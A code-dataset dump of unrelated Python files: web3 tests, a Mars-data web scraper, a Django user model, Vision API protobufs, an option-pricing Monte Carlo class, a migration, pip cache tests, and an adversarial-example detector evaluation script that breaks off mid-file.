ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 1a4f93fdae7dae7bc7195d7acc9b371544f0f1be | import pytest
from newchain_web3 import (
EthereumTesterProvider,
Web3,
)
from newchain_web3.providers.eth_tester.main import (
AsyncEthereumTesterProvider,
)
from newchain_web3.version import (
AsyncVersion,
BlockingVersion,
Version,
)
@pytest.fixture
def blocking_w3():
return Web3(
EthereumTesterProvider(),
modules={
'blocking_version': BlockingVersion,
'legacy_version': Version
})
@pytest.fixture
def async_w3():
return Web3(
AsyncEthereumTesterProvider(),
middlewares=[],
modules={
'async_version': AsyncVersion,
})
def test_blocking_version(blocking_w3):
assert blocking_w3.blocking_version.api == blocking_w3.legacy_version.api
assert blocking_w3.blocking_version.node == blocking_w3.legacy_version.node
assert blocking_w3.blocking_version.ethereum == blocking_w3.legacy_version.ethereum
@pytest.mark.asyncio
async def test_async_blocking_version(async_w3, blocking_w3):
assert async_w3.async_version.api == blocking_w3.legacy_version.api
assert await async_w3.async_version.node == blocking_w3.legacy_version.node
with pytest.raises(
ValueError,
message="RPC Endpoint has not been implemented: eth_protocolVersion"
):
assert await async_w3.async_version.ethereum == blocking_w3.legacy_version.ethereum
|
py | 1a4f942e037d338d4447fe92bdae726ae115e5dd | #imports
from splinter import Browser
from bs4 import BeautifulSoup as soup
from webdriver_manager.chrome import ChromeDriverManager
import datetime as dt
#scrape all function
def scrape_all():
# need to return a json that has data to load into database (MongoDB)
# Set up Splinter
executable_path = {'executable_path': ChromeDriverManager().install()}
browser = Browser('chrome', **executable_path, headless=False)
# get datta from news page #2add variables for news title and paragraph
news_title, news_paragraph = scrape_news(browser)
# then add info to dictionary
marsData = {
"newsTitle": news_title,
"newsParagraph": news_paragraph,
"featuredImage": scrape_images(browser),
"facts": scrape_facts(browser),
"hemispheres": scrape_hemisphere_pages(browser),
"lastUpdated": dt.datetime.now()
}
#stop webdriver
browser.quit()
return marsData
#scrape the mars news page
def scrape_news(browser):
# Visit the Mars news site
url = 'https://redplanetscience.com/'
browser.visit(url)
# Optional delay for loading the page
browser.is_element_present_by_css('div.list_text', wait_time=1)
# Convert the browser html to a soup object
html = browser.html
news_soup = soup(html, 'html.parser')
slide_elem = news_soup.select_one('div.list_text')
#get title
news_title = slide_elem.find('div', class_='content_title').get_text()
#get paragraph
news_p= slide_elem.find('div', class_='article_teaser_body').get_text()
#return title and para
return news_title, news_p
#scrape through the feature image page
def scrape_images(browser):
#vist imagges page
featured_image_url = 'https://spaceimages-mars.com'
browser.visit(featured_image_url)
# Find and click the full image button
full_image_link = browser.find_by_tag('button')[1]
full_image_link.click()
#parsing through with soup
html = browser.html
img_soup = soup(html, 'html.parser')
#locating mars image
img_url_rel = img_soup.find('img', class_='fancybox-image').get('src')
# Use the base url to create an absolute url
img_url = f'https://spaceimages-mars.com/{img_url_rel}'
return img_url
#scrape through facts page to get table
#grabbing the html code
def scrape_facts(browser):
facts_url = 'https://galaxyfacts-mars.com/'
browser.visit(facts_url)
html = browser.html
fact_soup = soup(html, 'html.parser')
#locating facts
facts_loc = fact_soup.find('div', class_="diagram mt-4")
fact_table = facts_loc.find('table') #getting html for fact table
facts = ""
#add text to facts
facts += str(fact_table)
return facts
#scrape hemisphere pages
def scrape_hemisphere_pages(browser):
hemi_url = 'https://marshemispheres.com/'
browser.visit(hemi_url)
# Create a list to hold the images and titles.
hemisphere_image_urls = []
# Get a list of all of the hemispheres
#links = browser.find_by_css('a.product-item img')
# Next, loop through those links, click the link, find the sample anchor, return the href
for i in range(4):
#make a dictionary for hemisphere
hemisphereInfo = {}
# We have to find the elements on each loop to avoid a stale element exception
browser.find_by_css('a.product-item img')[i].click()
# Next, we find the Sample image anchor tag and extract the href
sample = browser.links.find_by_text('Sample').first
hemisphereInfo["img_url"] = sample['href']
# Get Hemisphere title
hemisphereInfo['title'] = browser.find_by_css('h2.title').text
# Append hemisphere object to list
hemisphere_image_urls.append(hemisphereInfo)
# Finally, we navigate backwards
browser.back()
return hemisphere_image_urls
#run script
if __name__ == "__main__":
print(scrape_all()) |
py | 1a4f95465cb751b971c5d28d2067fe41b6956f22 | from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
# create user
if not email:
raise ValueError('Please provide a valid email')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
# create super user
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
# custom user, replace username with email
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
|
py | 1a4f954d43ee6801899132666595d337ec2a73d9 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.vision.v1p2beta1", manifest={"WebDetection",},
)
class WebDetection(proto.Message):
r"""Relevant information for the image from the Internet.
Attributes:
web_entities (Sequence[~.web_detection.WebDetection.WebEntity]):
Deduced entities from similar images on the
Internet.
full_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Fully matching images from the Internet.
Can include resized copies of the query image.
partial_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Partial matching images from the Internet.
Those images are similar enough to share some
key-point features. For example an original
image will likely have partial matching for its
crops.
pages_with_matching_images (Sequence[~.web_detection.WebDetection.WebPage]):
Web pages containing the matching images from
the Internet.
visually_similar_images (Sequence[~.web_detection.WebDetection.WebImage]):
The visually similar image results.
best_guess_labels (Sequence[~.web_detection.WebDetection.WebLabel]):
Best guess text labels for the request image.
"""
class WebEntity(proto.Message):
r"""Entity deduced from similar images on the Internet.
Attributes:
entity_id (str):
Opaque entity ID.
score (float):
Overall relevancy score for the entity.
Not normalized and not comparable across
different image queries.
description (str):
Canonical description of the entity, in
English.
"""
entity_id = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
description = proto.Field(proto.STRING, number=3)
class WebImage(proto.Message):
r"""Metadata for online images.
Attributes:
url (str):
The result image URL.
score (float):
(Deprecated) Overall relevancy score for the
image.
"""
url = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
class WebPage(proto.Message):
r"""Metadata for web pages.
Attributes:
url (str):
The result web page URL.
score (float):
(Deprecated) Overall relevancy score for the
web page.
page_title (str):
Title for the web page, may contain HTML
markups.
full_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Fully matching images on the page.
Can include resized copies of the query image.
partial_matching_images (Sequence[~.web_detection.WebDetection.WebImage]):
Partial matching images on the page.
Those images are similar enough to share some
key-point features. For example an original
image will likely have partial matching for its
crops.
"""
url = proto.Field(proto.STRING, number=1)
score = proto.Field(proto.FLOAT, number=2)
page_title = proto.Field(proto.STRING, number=3)
full_matching_images = proto.RepeatedField(
proto.MESSAGE, number=4, message="WebDetection.WebImage",
)
partial_matching_images = proto.RepeatedField(
proto.MESSAGE, number=5, message="WebDetection.WebImage",
)
class WebLabel(proto.Message):
r"""Label to provide extra metadata for the web detection.
Attributes:
label (str):
Label for extra metadata.
language_code (str):
The BCP-47 language code for ``label``, such as "en-US" or
"sr-Latn". For more information, see
http://www.unicode.org/reports/tr35/#Unicode_locale_identifier.
"""
label = proto.Field(proto.STRING, number=1)
language_code = proto.Field(proto.STRING, number=2)
web_entities = proto.RepeatedField(proto.MESSAGE, number=1, message=WebEntity,)
full_matching_images = proto.RepeatedField(
proto.MESSAGE, number=2, message=WebImage,
)
partial_matching_images = proto.RepeatedField(
proto.MESSAGE, number=3, message=WebImage,
)
pages_with_matching_images = proto.RepeatedField(
proto.MESSAGE, number=4, message=WebPage,
)
visually_similar_images = proto.RepeatedField(
proto.MESSAGE, number=6, message=WebImage,
)
best_guess_labels = proto.RepeatedField(proto.MESSAGE, number=8, message=WebLabel,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
py | 1a4f95883f31260019a05f999dbdb6d9f516cdbb | import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
import time
import bspline
import bspline.splinelab as splinelab
# The Black-Scholes prices
def bs_put(t, S0, K, r, sigma, T):
d1 = (np.log(S0 / K) + (r + 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
d2 = (np.log(S0 / K) + (r - 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
price = K * np.exp(-r * (T - t)) * norm.cdf(-d2) - S0 * norm.cdf(-d1)
return price
def bs_call(t, S0, K, r, sigma, T):
d1 = (np.log(S0 / K) + (r + 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
d2 = (np.log(S0 / K) + (r - 1 / 2 * sigma ** 2) * (T - t)) / sigma / np.sqrt(T - t)
price = S0 * norm.cdf(d1) - K * np.exp(-r * (T - t)) * norm.cdf(d2)
return price
def d1(S0, K, r, sigma, T):
return (np.log(S0 / K) + (r + sigma ** 2 / 2) * T) / (sigma * np.sqrt(T))
def d2(S0, K, r, sigma, T):
return (np.log(S0 / K) + (r - sigma ** 2 / 2) * T) / (sigma * np.sqrt(T))
class DiscreteBlackScholes:
"""
Class implementing discrete Black Scholes
DiscreteBlackScholes is class for pricing and hedging under
the real-world measure for a one-dimensional Black-Scholes setting
"""
def __init__(self,
s0,
strike,
vol,
T,
r,
mu,
numSteps,
numPaths):
"""
:param s0: initial price of the underlying
:param strike: option strike
:param vol: volatility
:param T: time to maturity, in years
:param r: risk-free rate,
:param mu: real drift, asset drift
:param numSteps: number of time steps
:param numPaths: number of Monte Carlo paths
"""
self.s0 = s0
self.strike = strike
self.vol = vol
self.T = T
self.r = r
self.mu = mu
self.numSteps = numSteps
self.numPaths = numPaths
self.dt = self.T / self.numSteps # time step
self.gamma = np.exp(-r * self.dt) # discount factor for one time step, i.e. gamma in the QLBS paper
self.sVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of stock values
# initialize half of the paths with stock price values ranging from 0.5 to 1.5 of s0
# the other half of the paths start with s0
half_paths = int(numPaths / 2)
if False:
# Grau (2010) "Applications of Least-Squares Regressions to Pricing and Hedging of Financial Derivatives"
self.sVals[:, 0] = (np.hstack((np.linspace(0.5 * s0, 1.5 * s0, half_paths),
s0 * np.ones(half_paths, 'float')))).T
self.sVals[:, 0] = s0 * np.ones(numPaths, 'float')
self.optionVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of option values
self.intrinsicVals = np.zeros((self.numPaths, self.numSteps + 1), 'float')
self.bVals = np.zeros((self.numPaths, self.numSteps + 1), 'float') # matrix of cash position values
self.opt_hedge = np.zeros((self.numPaths, self.numSteps + 1),
'float') # matrix of optimal hedges calculated from cross-sectional information F_t
self.X = None
self.data = None # matrix of features, i.e. self.X as sum of basis functions
self.delta_S_hat = None
# coef = 1.0/(2 * gamma * risk_lambda)
# override it by zero to have pure risk hedge
self.coef = 0.
def gen_paths(self):
"""
A simplest path generator
"""
np.random.seed(42)
# Spline basis of order p on knots k
z = np.random.normal(0, 1, size=(self.numSteps + 1, self.numPaths)).T
for t in range(self.numSteps):
self.sVals[:, t + 1] = self.sVals[:, t] * np.exp(
(self.mu - 0.5 * self.vol ** 2) * self.dt + (self.vol * np.sqrt(self.dt) * z[:, t + 1]))
print(self.sVals)
# like in QLBS
delta_S = self.sVals[:, 1:] - np.exp(self.r * self.dt) * self.sVals[:, :self.numSteps]
self.delta_S_hat = np.apply_along_axis(lambda x: x - np.mean(x), axis=0, arr=delta_S)
# state variable
# delta_t here is due to their conventions
self.X = - (self.mu - 0.5 * self.vol ** 2) * np.arange(self.numSteps + 1) * self.dt + np.log(self.sVals)
X_min = np.min(np.min(self.X))
X_max = np.max(np.max(self.X))
print('X.shape = ', self.X.shape)
print('X_min, X_max = ', X_min, X_max)
p = 4 # order of spline (as-is; 3 = cubic, 4: B-spline?)
ncolloc = 12
tau = np.linspace(X_min, X_max, ncolloc) # These are the sites to which we would like to interpolate
# k is a knot vector that adds endpoints repeats as appropriate for a spline of order p
# To get meaningful results, one should have ncolloc >= p+1
k = splinelab.aptknt(tau, p)
basis = bspline.Bspline(k, p)
num_basis = ncolloc # len(k) #
self.data = np.zeros((self.numSteps + 1, self.numPaths, num_basis))
print('num_basis = ', num_basis)
print('dim self.data = ', self.data.shape)
# fill it, expand function in finite dimensional space
# in neural network the basis is the neural network itself
t_0 = time.time()
for ix in np.arange(self.numSteps + 1):
x = self.X[:, ix]
self.data[ix, :, :] = np.array([basis(el) for el in x])
t_end = time.time()
print('\nTime Cost of basis expansion:', t_end - t_0, 'seconds')
def function_A_vec(self, t, reg_param=1e-3):
"""
function_A_vec - compute the matrix A_{nm} from Eq. (52) (with a regularization!)
Eq. (52) in QLBS Q-Learner in the Black-Scholes-Merton article
Arguments:
t - time index, a scalar, an index into time axis of data_mat
reg_param - a scalar, regularization parameter
Return:
- np.array, i.e. matrix A_{nm} of dimension num_basis x num_basis
"""
X_mat = self.data[t, :, :]
num_basis_funcs = X_mat.shape[1]
this_dS = self.delta_S_hat[:, t]
hat_dS2 = (this_dS ** 2).reshape(-1, 1)
A_mat = np.dot(X_mat.T, X_mat * hat_dS2) + reg_param * np.eye(num_basis_funcs)
return A_mat
def function_B_vec(self, t, Pi_hat):
"""
function_B_vec - compute vector B_{n} from Eq. (52) QLBS Q-Learner in the Black-Scholes-Merton article
Arguments:
t - time index, a scalar, an index into time axis of delta_S_hat
Pi_hat - pandas.DataFrame of dimension N_MC x T of portfolio values
Return:
B_vec - np.array() of dimension num_basis x 1
"""
tmp = Pi_hat * self.delta_S_hat[:, t] + self.coef * (np.exp((self.mu - self.r) * self.dt)) * self.sVals[:, t]
X_mat = self.data[t, :, :] # matrix of dimension N_MC x num_basis
B_vec = np.dot(X_mat.T, tmp)
return B_vec
def seed_intrinsic(self, strike=None, cp='P'):
"""
initilaize option value and intrinsic value for each node
"""
if strike is not None:
self.strike = strike
if cp == 'P':
# payoff function at maturity T: max(K - S(T),0) for all paths
self.optionVals = np.maximum(self.strike - self.sVals[:, -1], 0).copy()
# payoff function for all paths, at all time slices
self.intrinsicVals = np.maximum(self.strike - self.sVals, 0).copy()
elif cp == 'C':
# payoff function at maturity T: max(S(T) -K,0) for all paths
self.optionVals = np.maximum(self.sVals[:, -1] - self.strike, 0).copy()
# payoff function for all paths, at all time slices
self.intrinsicVals = np.maximum(self.sVals - self.strike, 0).copy()
else:
raise Exception('Invalid parameter: %s' % cp)
self.bVals[:, -1] = self.intrinsicVals[:, -1]
def roll_backward(self):
"""
Roll the price and optimal hedge back in time starting from maturity
"""
for t in range(self.numSteps - 1, -1, -1):
# determine the expected portfolio value at the next time node
piNext = self.bVals[:, t + 1] + self.opt_hedge[:, t + 1] * self.sVals[:, t + 1]
pi_hat = piNext - np.mean(piNext)
A_mat = self.function_A_vec(t)
B_vec = self.function_B_vec(t, pi_hat)
phi = np.dot(np.linalg.inv(A_mat), B_vec)
self.opt_hedge[:, t] = np.dot(self.data[t, :, :], phi)
self.bVals[:, t] = np.exp(-self.r * self.dt) * (
self.bVals[:, t + 1] + (self.opt_hedge[:, t + 1] - self.opt_hedge[:, t]) * self.sVals[:, t + 1])
# calculate the initial portfolio value
initPortfolioVal = self.bVals[:, 0] + self.opt_hedge[:, 0] * self.sVals[:, 0]
# use only the second half of the paths generated with paths starting from S0
optionVal = np.mean(initPortfolioVal)
optionValVar = np.std(initPortfolioVal)
delta = np.mean(self.opt_hedge[:, 0])
return optionVal, delta, optionValVar
if __name__ == "__main__":
np.random.seed(42)
strike_k = 95
test_vol = 0.2
test_mu = 0.03
dt = 0.01
rfr = 0.05
num_paths = 100
num_periods = 252
hMC = DiscreteBlackScholes(100, strike_k, test_vol, 1., rfr, test_mu, num_periods, num_paths)
hMC.gen_paths()
t = hMC.numSteps - 1
piNext = hMC.bVals[:, t+1] + 0.1 * hMC.sVals[:, t+1]
pi_hat = piNext - np.mean(piNext)
A_mat = hMC.function_A_vec(t)
B_vec = hMC.function_B_vec(t, pi_hat)
phi = np.dot(np.linalg.inv(A_mat), B_vec)
opt_hedge = np.dot(hMC.data[t, :, :], phi)
# plot the results
fig = plt.figure(figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.scatter(hMC.sVals[:,t], pi_hat)
ax1.set_title(r'Expected $\Pi_0$ vs. $S_t$')
ax1.set_xlabel(r'$S_t$')
ax1.set_ylabel(r'$\Pi_0$')
# input parameters
s0 = 100.0
strike = 100.0
r = 0.05
mu = 0.07 # 0.05
vol = 0.4
T = 1.0
# Simulation Parameters
numPaths = 50000 # number of Monte Carlo trials
numSteps = 6
# create the class object
hMC = DiscreteBlackScholes(s0, strike, vol, T, r, mu, numSteps, numPaths)
# calculation
hMC.gen_paths()
hMC.seed_intrinsic()
option_val, delta, option_val_variance = hMC.roll_backward()
bs_call_value = bs_put(0, s0, K=strike, r=r, sigma=vol, T=T)
print('Option value = ', option_val)
print('Option value variance = ', option_val_variance)
print('Option delta = ', delta)
print('BS value', bs_call_value)
strikes = np.linspace(85, 110, 6)
results = [None] * len(strikes)
bs_prices = np.zeros(len(strikes))
bs_deltas = np.zeros(len(strikes))
numPaths = 50000
hMC = DiscreteBlackScholes(s0, strike, vol, T, r, mu, numSteps, numPaths)
hMC.gen_paths()
for ix, k_strike in enumerate(strikes):
hMC.seed_intrinsic(k_strike)
results[ix] = hMC.roll_backward()
bs_prices[ix] = bs_put(0, s0, K=k_strike, r=r, sigma=vol, T=T)
bs_deltas[ix] = norm.cdf(d1(s0, K=k_strike, r=r, sigma=vol, T=T)) - 1
print("BS price: ", bs_prices)
mc_prices = np.array([x[0] for x in results])
mc_deltas = np.array([x[1] for x in results])
price_variances = np.array([x[-1] for x in results])
prices_diff = mc_prices - bs_prices
deltas_diff = mc_deltas - bs_deltas
print("Price variances: ", price_variances)
|
py | 1a4f968708c13eb6dc99b6763d0793e7e45bc208 | """empty message
Revision ID: 3ca97c203761
Revises: ddc9ab150f3e
Create Date: 2021-05-11 14:59:39.803671
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '3ca97c203761'
down_revision = 'ddc9ab150f3e'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('category',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('category_id', sa.Integer(), nullable=True),
sa.Column('author_id', sa.Integer(), nullable=True),
sa.Column('title', sa.String(length=80), nullable=True),
sa.Column('body', sa.Text(), nullable=True),
sa.Column('image', sa.String(length=36), nullable=True),
sa.Column('slug', sa.String(length=255), nullable=True),
sa.Column('publish_date', sa.DateTime(), nullable=True),
sa.Column('live', sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(['author_id'], ['author.id'], ),
sa.ForeignKeyConstraint(['category_id'], ['category.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('slug')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('post')
op.drop_table('category')
# ### end Alembic commands ###
|
py | 1a4f980dbfa8a1fc07e9c678fe43201bc3281b73 | """
Programa 115
Área de estudos.
data 13.12.2020 (Indefinida) Hs
@Autor: Abraão A. Silva
"""
# Abrimos um arquivo para gravação de dados.
arquivo = open('/home/abraao/Documentos/testando.txt', 'w') # Modo 'w' sobrescreve o arquivo.
while True:
nome = str(input('Nome: '))
if nome.isdigit():
print('Programa encerrado.')
break
else:
arquivo.write(nome+'\n')
arquivo.close()
# Ou
arquivo = open('/home/abraao/Documentos/testando.txt', 'a') # Modo 'a' Anexa uma atrás da outra.
for n in range(3):
nome = str(input('Nome: '))
arquivo.write(nome+'\n')
arquivo.close()
|
py | 1a4f98905332db2ed492adf6a4a98a55a83a80ec | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 25 18:47:55 2018
@author: bokorn
"""
import cv2
import numpy as np
import tensorflow as tf
def convertSummary(val):
if(val.HasField('simple_value')):
return val.simple_value
elif(val.HasField('obsolete_old_style_histogram')):
raise NotImplementedError()
elif(val.HasField('image')):
return cv2.imdecode(np.frombuffer(val.image.encoded_image_string, np.uint8), cv2.IMREAD_COLOR)
elif(val.HasField('histo')):
return {'bins':val.histo.bucket, 'lims':val.histo.bucket_limit}
elif(val.HasField('audio')):
raise NotImplementedError()
elif(val.HasField('tensor')):
raise NotImplementedError()
return val.tensor.string_val
else:
raise ValueError('Invalid summary type %'.format(val))
def getSummaryData(path, tags):
if(type(tags) is str):
tags = [tags]
data = {}
for t in tags:
data[t] = []
try:
for e in tf.train.summary_iterator(path):
for v in e.summary.value:
if v.tag in tags:
data[v.tag].append([e.step, convertSummary(v)])
except Exception as e:
print(e)
pass
return data
def getWallTime(path):
data = []
try:
for e in tf.train.summary_iterator(path):
data.append([e.step, e.wall_time])
except Exception as e:
print(e)
pass
return data
|
py | 1a4f98b28bd1740021ee5fd3efdf4e08dad3127f | import os
from pip._vendor.packaging.tags import Tag
from pip._internal.cache import WheelCache, _hash_dict
from pip._internal.models.format_control import FormatControl
from pip._internal.models.link import Link
from pip._internal.utils.compat import expanduser
from pip._internal.utils.misc import ensure_dir
def test_expands_path():
wc = WheelCache("~/.foo/", None)
assert wc.cache_dir == expanduser("~/.foo/")
def test_falsey_path_none():
wc = WheelCache(False, None)
assert wc.cache_dir is None
def test_subdirectory_fragment():
"""
Test the subdirectory URL fragment is part of the cache key.
"""
wc = WheelCache("~/.foo/", None)
link1 = Link("git+https://g.c/o/r#subdirectory=d1")
link2 = Link("git+https://g.c/o/r#subdirectory=d2")
assert wc.get_path_for_link(link1) != wc.get_path_for_link(link2)
def test_wheel_name_filter(tmpdir):
"""
Test the wheel cache filters on wheel name when several wheels
for different package are stored under the same cache directory.
"""
wc = WheelCache(tmpdir, FormatControl())
link = Link("https://g.c/package.tar.gz")
cache_path = wc.get_path_for_link(link)
ensure_dir(cache_path)
with open(os.path.join(cache_path, "package-1.0-py3-none-any.whl"), "w"):
pass
# package matches wheel name
cached_link = wc.get(link, "package", [Tag("py3", "none", "any")])
assert cached_link is not link
assert os.path.exists(cached_link.file_path)
# package2 does not match wheel name
assert wc.get(link, "package2", [Tag("py3", "none", "any")]) is link
def test_cache_hash():
h = _hash_dict({"url": "https://g.c/o/r"})
assert h == "72aa79d3315c181d2cc23239d7109a782de663b6f89982624d8c1e86"
h = _hash_dict({"url": "https://g.c/o/r", "subdirectory": "sd"})
assert h == "8b13391b6791bf7f3edeabb41ea4698d21bcbdbba7f9c7dc9339750d"
h = _hash_dict({"subdirectory": u"/\xe9e"})
assert h == "f83b32dfa27a426dec08c21bf006065dd003d0aac78e7fc493d9014d"
def test_get_path_for_link_legacy(tmpdir):
"""
Test that an existing cache entry that was created with the legacy hashing
mechanism is returned by WheelCache._get_candidates().
"""
wc = WheelCache(tmpdir, FormatControl())
link = Link("https://g.c/o/r")
path = wc.get_path_for_link(link)
legacy_path = wc.get_path_for_link_legacy(link)
assert path != legacy_path
ensure_dir(path)
with open(os.path.join(path, "test-1.0.0-pyz-none-any.whl"), "w"):
pass
ensure_dir(legacy_path)
with open(os.path.join(legacy_path, "test-1.0.0-pyx-none-any.whl"), "w"):
pass
expected_candidates = {
"test-1.0.0-pyx-none-any.whl", "test-1.0.0-pyz-none-any.whl"
}
candidates = {c[0] for c in wc._get_candidates(link, "test")}
assert candidates == expected_candidates
def test_get_with_legacy_entry_only(tmpdir):
"""
Test that an existing cache entry that was created with the legacy hashing
mechanism is actually returned in WheelCache.get().
"""
wc = WheelCache(tmpdir, FormatControl())
link = Link("https://g.c/o/r")
legacy_path = wc.get_path_for_link_legacy(link)
ensure_dir(legacy_path)
with open(os.path.join(legacy_path, "test-1.0.0-py3-none-any.whl"), "w"):
pass
cached_link = wc.get(link, "test", [Tag("py3", "none", "any")])
assert (
os.path.normcase(os.path.dirname(cached_link.file_path)) ==
os.path.normcase(legacy_path)
)
|
py | 1a4f98cfdb2d52f086dcc6df7a53f48693038b37 | import os
import sys
def test1():
target = os.path.join(os.path.dirname(__file__), 'test1.py')
os.execv(target, sys.argv)
def test2():
target = os.path.join( os.path.dirname(__file__), 'test2.py')
print("target = %s" %target)
os.execl(sys.executable, 'python', target, sys.argv)
|
py | 1a4f99788e670ecd4d54a54d2fffbfa4105e9022 | import sys
sys.path.append(".")
import os
from datetime import datetime
import argparse
import logging
import glob
import random
import numpy as np
import torch
import torch.nn as nn
import misc.utils as utils
from misc.load_dataset import LoadDataset
from torch.utils.data import DataLoader
from models import *
from models.rr_detector import RRdetector
np.set_printoptions(precision=4, suppress=True, linewidth=120)
def preprocess(ae_data):
"""revert the mnist data back to one channel
"""
logging.warning("This will revert data to one channel.")
for idx in range(len(ae_data["x_ori"])):
if ae_data["x_ori"][idx].shape[-3] > 1:
ae_data["x_ori"][idx] = \
ae_data["x_ori"][idx].mean(dim=-3, keepdim=True)
for key in ae_data["x_adv"]:
for idx in range(len(ae_data["x_adv"][key])):
if ae_data["x_adv"][key][idx].shape[-3] > 1:
ae_data["x_adv"][key][idx] = \
ae_data["x_adv"][key][idx].mean(dim=-3, keepdim=True)
def test_whitebox(args, path, detector):
# format of ae_data, total 2400+ samples:
# ae_data["x_adv"]: dict(eps[float]:List(batch Tensor data, ...))
# ae_data["x_ori"]: List(torch.Tensor, ...)
# ae_data["y_ori"]: List(torch.Tensor, ...)
# x_adv and x_ori in range of (0,1), without normalization
for file in path.split(";"):
ae_data = torch.load(file)
x_adv_all = ae_data["x_adv"]
y_ori = ae_data["y_ori"]
x_ori = ae_data["x_ori"]
if args.dataset == "MNIST":
# for Mnist, the data is saved with three channel
ae_data = preprocess(ae_data)
# test classifier on clean sample
clean_pred = []
for img, _ in zip(x_ori, y_ori):
# here we expect data in range [0, 1]
img = img.cuda()
y_pred = detector.classify_normal(img, len(img)).cpu()
clean_pred.append(y_pred)
clean_pred = torch.cat(clean_pred)
# concat each batch to one
y_ori = torch.cat(y_ori, dim=0)
cls_cor = (clean_pred == y_ori)
logging.info("cls acc: {}".format(cls_cor.sum().item() / len(cls_cor)))
all_acc = [[], []]
for eps in x_adv_all:
x_adv = x_adv_all[eps]
# concat each batch to one
x_adv = torch.cat(x_adv, dim=0)
adv_pred = detector.classify_normal(x_adv, args.batch_size)
all_pass, _ = detector.detect(x_adv, args.batch_size)
should_rej = (adv_pred != y_ori)
# attack suss rate: robust acc is
# 1 - #(pass and incorrect samples)/#(all perturbed samples)
# here is the #(pass and incorrect samples)
incor_pass = torch.logical_and(should_rej, all_pass.cpu())
rob_acc = 1. - torch.mean(incor_pass.float()).item()
# TPR: acc for (attack suss and reject) / attack suss
tp_fn = torch.logical_and(cls_cor, should_rej)
tp = torch.logical_and(
torch.logical_and(cls_cor, should_rej), all_pass.cpu() == 0
)
TPR = (tp.sum() / tp_fn.sum()).item()
logging.info("on AE: {} eps={}".format(file, eps))
logging.info("robust acc: {:.4f}".format(rob_acc))
logging.info("TPR: {:.4f}".format(TPR))
all_acc[0].append(rob_acc)
all_acc[1].append(TPR)
logging.info("Results: {}".format(np.array(all_acc)))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Test MagNet AE detector")
parser.add_argument("--ae_path", type=str)
parser.add_argument("--dataset", default="cifar10", type=str)
parser.add_argument(
"--results_dir", default="./trained_models/ae_test", type=str)
parser.add_argument("--data_path", default="./dataset", type=str)
parser.add_argument("--img_size", default=(32, 32), type=tuple)
parser.add_argument("--batch_size", default=256, type=int)
parser.add_argument("--drop_rate", default=0.05, type=float)
args = parser.parse_args()
random.seed(1)
torch.random.manual_seed(1)
# define model according to dataset
if args.dataset == "MNIST":
classifier = Mnist2LayerNet
key = "model"
cls_norm = [[0.13], [0.31]]
args.img_size = (28, 28)
# RR params
weight = "trained_models/MNIST/PGDAT_Mnist2LayerNetBN_adaptiveT1.0_selfreweightCalibrate_SGconW_seed0/model_best.pth"
num_cla = 10
elif args.dataset == "cifar10":
classifier = densenet169
key = None
cls_norm = [(0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)]
weight = "trained_models/CIFAR-10/PGDAT_densenet169BN_adaptiveT1.0_selfreweightCalibrate_SGconW_seed0/model_best_s.pth"
# RR params
num_cla = 10
elif args.dataset == "gtsrb":
classifier = ResNet18
key = "model"
cls_norm = [(0.3337, 0.3064, 0.3171), (0.2672, 0.2564, 0.2629)]
# RR params
weight = "trained_models/gtsrb/PGDAT_ResNet18BN_adaptiveT1.0_selfreweightCalibrate_SGconW_seed0/model_best.pth"
num_cla = 43
else:
raise NotImplementedError()
# log
args.results_dir = os.path.join(
args.results_dir, 'RR-1-{}-'.format(args.dataset) +
datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
)
run_name = args.dataset
if not os.path.exists(args.results_dir):
os.makedirs(args.results_dir)
utils.make_logger(run_name, args.results_dir)
logging.info(args)
# detector
classifier = classifier(num_classes=num_cla,
along=True, out_dim=1, use_BN=True)
detector = RRdetector(classifier, cls_norm)
detector.load_classifier(weight)
